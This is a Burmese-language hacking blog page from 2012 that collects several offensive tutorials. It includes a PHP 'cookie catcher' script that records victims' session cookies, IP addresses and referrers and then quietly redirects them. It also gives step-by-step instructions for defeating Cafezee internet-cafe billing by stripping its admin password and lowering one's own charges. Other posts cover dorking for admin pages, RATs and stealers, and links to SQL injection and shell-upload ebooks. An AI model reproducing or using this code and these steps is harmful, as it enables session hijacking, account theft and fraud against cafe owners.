က admin page hottest list ျဖည္႔ျပီး save ျပီးသံုးပါ...ဒါဆို list 900 ေက်ာ္ရပါမယ္....Havij ကို မၾကိဳက္ဘူးဆိုျပန္ရင္းလည္း တျခား admin finder ေတြကို ကိုယ္႔ဘာသာကိုယ္ googling ျပီးလိုက္ရွာ ေဒါင္း သံုးၾကေပေရာဗ်ာ.....ကဲ...ဒီတစ္ဆင္႔လည္း မဟန္ေသးဘူး ဆိုၾကပါစုိ႔...  

နံပါတ္ေလး - dorking ေလးနဲ႔စမ္းၾကည္႔မယ္ဗ်ာ...
ဒါေလးနဲ႔ထည္႔ရွာဗ်ာ...

Dork: site:webpage.com "admin"
site:webpage.com "login"

နံပါတ္ငါး - robots.txt ကိုစစ္မယ္ဗ်ာ...
www.site.com/robots.txt ကိုတစ္ခ်က္ရိႈးၾကည္႔ပါ...

နံပါတ္ေျခာက္ - Web Scanner နဲ႔သာ crawl လုပ္ျပီးသာ url တစ္ခုခ်င္းစီသာ စစ္ခ်ပါေတာ႔...ကၽြန္ေတာ္သံုးရင္ေတာ႔ albaloo 1.3 ကိုသံုးပါတယ္...2MB ေက်ာ္ေက်ာ္ပဲရွိေတာ႔ ေပါ႔ေပါ႔ပါးပါးေလးနဲ႔မို႔ပါ...ဒီမွာဆြဲႏိူင္ပါတယ္...

ဒါနဲ႔ ကၽြန္ေတာ္ေျပာထားျပီးသားေနာ္.....80% ေလာက္ပဲ လို႔..... 

post by hacker1989
ref: MHF

Read More ->>

Sunday, May 13, 2012

IIS Website Hacking with Windows 7



အရင္ကကၽြန္ေတာ္ ကၽြန္ေတာ့ဆိုက္ထဲမွာ IIS Hacking အေၾကာင္းတင္ေပးဘူးပါတယ္......။အဲဒီတုန္းက
တင္ေပးထားတာျပည့္ျပည့္စံုစံုပါပဲ .........။ဒါေပမယ့္ Ebook အေနနဲ႕ သိမ္းခ်င္သူမ်ားအတြက္.......
ethickiddie ေရးသာတဲ့စာအုပ္ေလးရိွပါတယ္......။ကၽြန္ေတာ္ကစာအုပ္ေတြလုပ္မေပးႏိုင္ေသးပါဘူး ....။
ဒီစာအုပ္ထဲမွာလဲေတာ္ေတာ္ေလးကိုျပည့္စံုေအာင္ေရးသာထားတာပါ.........။
လိုခ်င္ရင္ေဒါင္သြားလိုက္ပါ........။

Download 1
Download 2
Read More ->>

Network Hacking (myanmar) Ebook




BackTrack 5(BD5) နဲ႕ Network ကို Hack တဲ့နည္းကို ethickiddie ကအေသးစိတ္ေရးသာထားတာပါ.......။
လိုခ်င္ရင္မသြားႏိုင္ပါတယ္.....။
ဖတ္လို႕ေကာငး္ရင္ေတာ့
http://ethickiddie.blogspot.com/ မွာသြားေရာက္အားေပးလိုက္ပါဦး.......။

DownloaD
Read More ->>

Saturday, May 12, 2012

Basic DNN Hacking Tutorial


3thic0kiddi3 ေရးတဲ့ DNN (DOT NET NUKE) hACKING စာအုပ္ျဖစ္ပါတယ္.....။ဒီနည္းလမ္းကေတာ့
WEB Hacking နည္းေတြထဲမွာ အလြယ္ကူ ဆံုးနည္းလမ္းလို႕လဲေျပာလို႕ရပါတယ္............။
သိပ္နားမလည္ရင္ေတာ့ ကၽြႏ္ေတာ့္ Cbox ထဲမွာ massage ခ်န္ခဲ့လို႕ရပါတယ္.......။

Download
http://downloads.ziddu.com/downloadfile/19283229/BasicDNNHackingTutorialBy3thic0kiddi3.pdf..html
Link 2
Read More ->>

Firefox ထဲမွာေနာက္ထပ္ Firefox တစ္ခုဖြင့္မယ္


ကိုတုတ္ေကာက္ ဆီကယူထားတာ .ေတာ္ေတာ္သေဘာက်တာနဲ႕ေလ.....Firefox မွာ Tag ေတြအမ်ားၾကီးသံုး
ေနရတဲ့သူေတြအတြက္ အရမ္းအဆင္ေျပတယ္ဗ်.....။ကၽြန္ေတာ္သံုးထားတာကိုေနာက္မွာနမူနာျပထားတယ္.


ဘယ္လိုလုပ္ရမလဲဆိုတာ လြယ္လြယ္ေလးရယ္ ဟီ........
ေအာက္ေဖာ္ျပပါကုတ္ေတြကို firefox address bar ထဲကို copy ကူးထည့္ျပီး enter ေခါက္လိုက္ရံုပါပဲ.....။

code:
chrome://browser/content/browser.xul

credit: z3r0c00l,dongoth,MHF
Read More ->>

About Linux and Ubuntu



Linux အေၾကာင္းနဲ႕ Ubuntu အေၾကာင္းစာေဆာင္အတိုေလးပါ......။ဖတ္ၾကည့္ေတာ့သမိုင္းေၾကာင္းကအစ ျပည့္
ၿပည့္ စံုစံုထည့္သြင္းေရးသာထားပါတယ္.....။ဗဟုသုတရခ်င္သူေတြအတြက္ အသ္ပညာတိုးေစမယ့္ စာအုပ္
ေလးတစ္အုပ္ျဖစ္ပါတယ္.........။

သန္ဒါေရးသားထားတာပါ.....။
MHF မွရရိွပါတယ္.......။

Download Links
http://ghostarea.net/wp-content/uploads/2012/04/ubuntu.pdf
http://www.ziddu.com/download/19376217/ubuntu.rar.html
Read More ->>

Friday, May 11, 2012

SQL Iɴᴊᴇᴄᴛɪᴏɴ Eɴᴄʏᴄʟᴏᴘᴇᴅɪᴄ - Hᴏᴡ ᴛᴏ Aᴛᴛᴀᴄᴋ & Dᴇғᴇɴᴅ







SQL Iɴᴊᴇᴄᴛɪᴏɴ Eɴᴄʏᴄʟᴏᴘᴇᴅɪᴄ - Hᴏᴡ ᴛᴏ Aᴛᴛᴀᴄᴋ & Dᴇғᴇɴᴅ - Dɪʀᴇᴄᴛ ʟɪɴᴋ
SQL injection အေၾကာင္းအျပည့္စံု ဆံုးစာအုပ္ျဖစ္ပါလိမ့္မယ္..။ကၽြန္ေတာ္ေတာ့ဖတ္ၾကည့္ျပီး အရမ္းေကာင္းတယ္လို႕ထင္ပါတယ္....။ဖတ္ခ်င္တဲ့သူေတြအတြက္
ျပန္လည္ေ၀မွ်ေပးတာပါ....။


Download Link


 
Thank To:Z3RO C00L (HF)
Read More ->>

Friday, May 4, 2012

Cookies Catchers



ဒီေန႕ေတာ့ Cookies Catcher ေတြအေၾကာင္းေျပာရေအာင္.Cookies Catcher ဆိုတာ Cookies ေတြကို Capture လုပ္ဖို႕ လုပ္ထားတဲ့ PHP Script ပါ။ ( Cookies ဆိုတာေတာ့အထူးေျပာဖို႕လိုမယ္မထင္ပါဘူး Browser ေတြမွာ User Login ေတြ Password ေတြကို သိမ္းထားတဲ့ Special Things ေတြေပါ့ ) ကဲ အခု Cookies Catcher တစ္ခုအေၾကာင္းၾကည့္ရေအာင္.
Code
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Website: '.$referer.'
');
fclose($fp);
header (\"javascript:history.back()\");
?>

တစ္ခုခ်င္းစီကိုၾကည့္ရေအာင္ဗ်ာ။
Code
$cookie = $_GET['cookie'];

ဒါကေတာ့ Get Method နဲ႕ Cookie ကိုယူပါတယ္
Code
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$referer=$_SERVER['HTTP_REFERER'];


REMOTE_ADDR ကေတာ့ Victim ရ႕ဲ IP ပါ
date
ကေတာ့ Cookies ယူတဲ့ ေန႕ပါ
HTTP_REFERER
ကေတာ့ Cookies သိမ္းခံရတဲ့ Address ပါ ( ဥပမာ Mail.google.com ေပါ့ ) XD
Code
$fp = fopen('cookies.html' 'a');
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Website: ‘.$referer.’
’);
fclose($fp);

ဒီေနရာေလးကေတာ့ နည္းနည္းရႈပ္သြားပါတယ္ ။ ပထမဆံုး cookies.html ဆိုတဲ့ File ကိုဖြင့္ပါတယ္ ျပီးတာနဲ႕ အဲ့ဒီ့ဖုိင္ထဲမွာ Cookies ကိုသြား Write ပါတယ္ ။ ခုန အထက္က ေရးထားတဲ့ IP , Date , Referer ေတြေရာေပါ့ ျပီးတာနဲ႕ cookies.html ကို ပိတ္လုိက္ပါတယ္
Code
header (\"javascript:history.back()\");
ေနာက္ဆံုးအေၾကာင္းအေနနဲ႕ေတာ့ User ကို Cookies Catcher ထဲကိုေရာက္ျပီး Catcher က Cookies ေတြသိမ္းအျပီး ဘယ္ကို ျပန္ပို႕မယ္ဆုိတာပါ အခုေတာ့ ၀င္ခဲ့တဲ့ေနာက္တစ္ေနရာကိုျပန္ပို႕ထားပါတယ္ (ဥပမာ User က www.site.com/index.php?=shop.phpက လာတယ္ အဲ့မွာ Cookies Catcher ကို၀င္မိသြားတယ္ www.target.com/cookiescatcher.phpေပါ့ Cookies Catcher ကလည္း cookies.html မွာ Cookies ေတြသိမ္းတယ္ ေရာက္သြားတာနဲ႕ Cookies သိမ္းသြားတာကို User မသိလိုက္ပါ ျပီးမွ သိမ္းျပီးမွ User ကိုတစ္ေနရာရာျပန္ပို႕လုိက္ပါတယ္ ဥပမာ index.php ကိုပဲေပါ့ ) 
ကဲ ဒီေလာက္ဆုိ အဆင္ေျပမယ္ထင္ပါတယ္ 
ဒီလုိမ်ိဳး တျခားတစ္ေယာက္ေရးထားတာ ဖတ္ဖူးလို႕ သူ႕ဟာကိုရွာမရတာနဲ႕ ကိုယ္တိုင္စမ္းတ၀ါး၀ါးေရးလိုက္ရပါတယ္  :-D 

source from ghostarea.net
Read More ->>

Thursday, May 3, 2012

How To Deface Blospot


ဒါေလးကေတာ့မသိေသးတဲ့ လူေတြအတြက္ေတာ့ခက္တယ္ဗ်ာ ဒါေပမယ့္ လြယ္တဲ့လူေတြအတြက္ကေတာ့ ထမင္းစားေးရေသာက္ေပါ့ဗ်ာ။ ခက္တာက ကၽြန္ေတာ္ ကဘယ္အဆင့္ထဲမွာမွမပါဘူးေလ :D ကဲကဲ အဆင့္တစ္ကေနျပီးေတာ့ စလိုက္ရေအာင္ဗ်ာ။
၁။ sign in to www.blogger.com.
၂။ Design ===> Edit Html ကိုအဆင့္ဆင့္ေရြးလိုက္ပါ။ အဆင့္ကေတာ့ ဒီမွာတင္ျပီးေနျပီေလ :D
၃။ အဲဒီေအာက္နားေလးမွာ Revert to Classic Template  ဆိုျပီးေတာ့ရွိပါတယ္ :D ေအာက္မွာျပထားပါတယ္။


၄။ ျပီးရင္ေတာ့ ေအာက္ကေဘာက္ေလးက်လာပါလိမ့္မယ္။ အိုေခေပးလိုက္ပါ :D။ျပီးရင္ခဏေစာင့္လို္က္ပါ။


၅။ ေစာင့္လိုက္ရင္ေတာ့ ဒီလိုေလးျဖစ္သြားပါတယ္။


၆။ ျပီးရင္ <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> အဲဒါေတြအကုန္လုံးကိုဖ်က္လုိက္ပါ။ျပီးသြားရင္ေတာ့ သင့္ရဲ႕ Deface Code ေတြကိုထည့္ေပးလိုက္ပါ။
ထည္သည့္အခါမွာေတာ့ အကုန္ျပီးရင္ေတာ့ body tag ကိုရွာလိုက္ပါျပီးရင္ေတာ့ ေပးထားတဲ့ကုတ္ ေလးကိုထည့္ေပးလိုက္ပါ။
အဲဒါဆိုရင္ေတာ့ Blogspot ကို Deface ထိုးနည္ေလးပါပဲ မွတ္ခ်က္ အေကာင့္သိမွသာရမည္ :D


REF: cyber coder
Read More ->>

Cafezee Hack



Cafezee ကို hack ၾကရေအာင္ဗ်ာ.(ဒါမ်ား လြယ္လြယ္ေလး လို႔ ေျပာၾကမယ္ ထင္တယ္ :P .. Tutorial တစ္ခုအေနနဲ႔ပါ) ၾကိဳးစားျပီး အျပည့္စံုဆံုး ျဖစ္ေအာင္ ေရးထားပါတယ္။
အပိုင္းႏွစ္ပို္င္းခြဲထားပါသည္။ပထမပိုင္း ကို သင္ အင္တာနက္ ဆိုင္ေရာက္၍ စတင္ သံုး သံုးျခင္း လုပ္ေဆာင္ရမည္။ ဒုတိယပိုင္း သည္ သင္ သံုး၍ ျပီးလွ်င္ လုပ္ေဆာင္ရမည္။

ပထမပိုင္း
c:\WINDOWS\system32 ေအာက္ရွိ client.pra နဲ႕ client2.pra ဆိုတဲ့ file ႏွစ္ file ကို copy ကူးျပီး Desktop ေပၚ paste ခ်ပါ။(ပံုမွန္အတိုင္း ၄င္းႏွစ္file သည္ system32 ေအာက္တြင္ ရွိသည္. မရွိပါက တစ္ျခား partition ထဲသို႔ ၀င္ Cafezee folder ေအာက္တြင္ ၀င္ရွာပါ။
Image
၄င္း ႏွစ္ file အား Microsoft access ျဖင့္ဖြင့္ပါ။Password ေတာင္းပါလိမ့္မည္။(vanarp117)ဟု ရိုက္လိုက္ပါ။
ပြင့္သြားပါက Control သိ္ု႔၀င္ျပီး Admin password (ေအာက္ပံုမွာ အနီေရာင္နဲ႔ တားထား) ကို ဖ်က္လိုက္ပါ။

ျပီးလွ်င္ ထြက္လုိက္ပါ။ (save လုပ္စရာမလိုပါဘူး.. လုပ္လို႔လဲမရပါ save ေနရာတြင္

မီးခိုးေရာင္ျဖစ္ေနလိမ့္မည္။

 ႏွစ္ file စလံုး ကို ထိုအတိုင္းလုပ္ပါ။
ျပီးလွ်င္ Ctrl+alt+delete ျဖင့္ Task manager ေခၚျပီး Explorer.exe အား end process လုပ္ျခင္းျဖင့္ Cafezee အား Kill လိုက္ပါ။(Explore.exe ျဖစ္သည္ explore.exe မဟုတ္ပါ)
ျပီးလွ်င္ ခုန ျပင္ထားတဲ့ ႏွစ္file ကို မူလ ေနရာသို႔ ျပန္ကူးထည့္လိုက္ပါ။ နာမည္တူ ရွိေန၍ overwrite မလားဟုေမးမည္ .. yes to all ေပးလိုက္ပါ။
Cafezee အားျပန္ run ပါ..

ဒုတိယပိုင္း
Cafezee ရဲ ႔ Admin option ထဲ၀င္ပါ။ password ေတာင္းမည္။ ဖ်က္ျပီးျပီ ျဖစ္၍ ဘာမွ မရိုက္ပဲ OK ႏွိပ္လိုက္ပါ။ သူ႔ရဲ ႔ Admin ထဲ၀င္သြားပါျပီ။
အဲ့ဒိမွာ ဘယ္ဘယ္ေအာက္ေထာင့္ နားေလာက္မွာ Adjustment ဆိုတာရွိတယ္ ႏွိပ္လိုက္ပါ..
TextBox ႏွစ္ခု အေသးတခု အၾကီးတခု ေတြ႔မယ္ . ေအာက္ အၾကီး က comment.. အေပၚတခု မွာ ေလွ်ာ့ ခ်င္တဲ့ amount ကို ရိုက္ရမည္.
ဥပမာ-(ပိုက္ဆံျဖင့္ သံုး သူဆိုလွ်င္ ကိုယ္က် တဲ့ ပိုက္ဆံ က ၅၀၀ ဆိုရင္ အဲ့ဒိမွာ ၅၀၀ ထိအမ်ားဆံုးေလွ်ာ့ လို႔ရတယ္)
(Member ဆိုရင္ ကိုယ္သံုးထားတယ့္ အခ်ိန္ က ၁နာရီခြဲ ဆိုရင္ မိနစ္နဲ႔ တြက္ရင္ ၉၀ မိနစ္ .. မိနစ္ ၉၀ ထိ အမ်ားဆံုးေလွ်ာ့လို႔ ရတယ္)
ေလွ်ာ့ျပီးျပီဆိုရင္ close session ႏွိပ္ပါ။ (Continue ႏွိပ္လို႔မရပါ ဘာမွထူးမည္မဟုတ္ပါ)

AID
Cafezee ကို kill ျပီး file ႏွစ္ file ကုိျပန္ထည့္ တာ။ ျပန္ run တာ။ ကို ျမန္ႏိုင္ သမွ် ျမန္ျမန္ ျပဳလုပ္ပါ။
သင္ေလွ်ာ့ သည့္ ပမာဏ သည္လဲ ယုတၱိတန္ ပါေစ..
Task manager အား ပိတ္ထားသည္ ဆိုပါက ေအာက္ တြင္ ေပးထားသည့္ Kill Process ကိုေဒါင္းျပီး kill ႏိုင္ပါသည္
Microsoft access မရွိပါက လည္း သံုးႏိုင္ ရန္ ေအာက္တြင္ portable Microsoft office 2003 အား download လုပ္ႏိုင္ပါသည္။ သင့္ pen drive ထဲထည့္၍ လိုအပ္သည့္ အခ်ိန္အဆင္သင့္သံုးပါ။

ဒီေလာက္ဆိုရင္ ျပည့္စံုျပီထင္ပါသည္။

Kill Process

Portable MSoffice 03

Credit To Original Uploader And  To Me
Read More ->>

Shell Uploading Via PHP Myadmin(ebook)


ထံုးစံအတိုင္း နေဂးတစ္သန္ဒါေရးထားတာပါ..........။ကၽြန္ေတာ္စုေဆာင္းထားခ်င္လို႕ တင္ထားပါ...။
လိုခ်င္တဲ့သူရိွရင္လဲ .......ေဒါင္းသြားႏိုင္တာေပါ့ဗ်ာ.....။
MHF ကိုလဲ ခရက္တစ္ ေပးပါတယ္ဗ်ာ.......။
ေအာက္ကလင့္မွာရႏိုင္ပါတယ္........။

Download
Read More ->>

ကိုယ့္ကြန္ျပဴတာကေနတျခားကြန္ျပဴတာကိုထိန္းခ်ဳပ္ႏိုင္းသလား???




MHF မွာ ေဆြးေႏြးထားတာေလးပါ.......။ကၽြန္ေတာ္ၾကိဳက္လိုပို႕စ္တစ္ပုဒ္ အေနနဲ႕ ျပန္သိမ္းထားတာ....။

ွQuestion....../      /မဂၤလာပါ အကိုတို ့.................................
ညီတစ္ခုေလာက္သိခ်င္လို ့ပါ ။ ကိုယ့္ Computer ကေန တျခား Computer ကိုဘယ္လိုထိန္းတလဲသိခ်င္လို ့ပါ..ညီမွာ TeamViewer လဲရွိပါတယ္. ။ဒီ ဟာကို ညီသိပ္မျကိုက္လို ့။ တျခားနည္းေလး၇ွိ၇င္ေပးပါလားဗ်ာ..........

Answer(1)......./      /ဟုတ္ကဲ့ ရတဲ့နည္းေတြကေတာ့မ်ားတယ္....
အဲဒီအထဲက တစ္ခုကိုေျပာျပပါ့မယ္..

အဲဒါက Window OS မွာ တစ္ခါတည္းပါ၀င္လာျပီးသားစနစ္တစ္ခုပါ
အဲဒါကေတာ့ Windows remote Assistance ျဖစ္ပါတယ္

ကဲ စရေအာင္ ........

နံပါတ္ ၂ က နံပါတ္ ၁ ကို ထိန္းခ်ဳပ္ခ်င္တယ္ ဆိုပါေတာ့
နံပါတ္ ၁ ဘက္ကေန အခုလို ပထမဆံုအေနနဲ့ လုပ္ေဆာင္ေပးရပါမယ္ ။ Programs ကေန Windows remote Assistance ကိုေခၚလိုက္ပါ
Windows remote Assistance ဆိုတဲ့ Box တစ္ခုက်လာတာနဲ့
Invite someone you trust to help you ကို ေ၇ြး ၊ Save this invitataion as a file ကိုထပ္ေရြး

အဲဒီဖိုင္ကို Desktop ေပၚမွာပဲ Save လိုက္ပါ ။ Save လိုက္တာနဲ့ တစ္ျပိဳင္နက္တည္း Box တစ္ခုက်လာပါဦးမယ္

အဲဒီ Box ထဲမွာ password ပါ တစ္ခါတည္းပါ၀င္လာပါမယ္ ။အဲဒီ password ကိုမွတ္ထား ျပီးရင္ နံပါတ္ ၂ ဘက္ကေန လုပ္မယ္

...............................................................

နံပါတ္ ၂ ဘက္ကေန Windows remote Assistance ကိုေခၚလိုက္
Windows remote Assistance ဆိုတဲ့ Box တစ္ခုက်လာတာနဲ့ Help someone who has invited you ကိုေရြး ျပီးရင္
Use Easy Connect ကိုထပ္ေရြး ၊ ေ၇ြးျပီးတာနဲ့ Enter the Easy Connect password ဆိုျပီး password ထည့္ခိုင္းလိမ့္မယ္
ခုနက မွတ္ထားခိုင္းတဲ့ password ကိုထည့္ေပးလိုက္

ဒါဆိုရင္ ျပီးျပီ......./

Answer(2)............./       /
RAT နဲ႕ ဆို ထိန္းႏိုင္မယ္ထင္တာပဲ

Note::: RAT လုပ္မယ္ဆိုေတာ္ေတာ္ သတိထားရပါတယ္..tools ေတြေတာ္ေတာ္မ်ားမ်ားကိုက fake program ေတြ
tools ေတြ ဆြဲျပီးသြားျပီ ဆိုရင္ေတာင္မွ Kaspersky က ခ်က္ခ်င္းလိုက္သတ္တယ္
ဘာလို႕လဲ ဆိုေတာ့ အဲဒီ tool ေတြ မွာ malicious codes ေတြ နဂိုကတည္းကပါတယ္
စမ္းသပ္မယ္ဆို
ကိုယ့္ အေရးၾကီးတဲ့ computer မွာ မစမ္းပါနဲ႕

Google မွာ ရိုက္ရွာဖို႕ :)
RAT ( Remote Administartion Tools )
RAT tutorial
ratting
network hacking
cain and able


ny4t.t33 ေရးထားတဲ့ prorat tutorial
prorattutorials-vt461.html

ဒါက deepfreeze ကို hack ဖို႕
credit to ==> shwekoyantaw
www.ziddu.com/download/15199708/DEEPFRE ... R.rar.html

Answer(3)......../       /ဒါေလးေကာင္းတယ္ ညီေရ ..
http://www.vedivi.com/support/blog/167- ... ernet.html

Rat သံုးခ်င္တယ္ဆိုရင္ေတာ့ Live connect ရဖို ့ port forward လုိပါတယ္... ဒါမွမဟုတ္ FTP host / email ( need username+pass << make is with secondary account to avoid backdoor ) ကို logs အေနနဲ ့ပို့တဲ့ stealer ေတြေလာက္ပဲ စသံုးၾကည့္ေပါ့ ....

ကိုယ္က သူမ်ားကို control လုပ္ခ်င္ရင္ေတာ့ ကိုယ္က သူ ့ထက္ smart ပိုၿဖစ္ဖို ့ေတာ့လိုတယ္ေနာ့္


copy from http://mmhackforums.noonhost.com 
Read More ->>

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology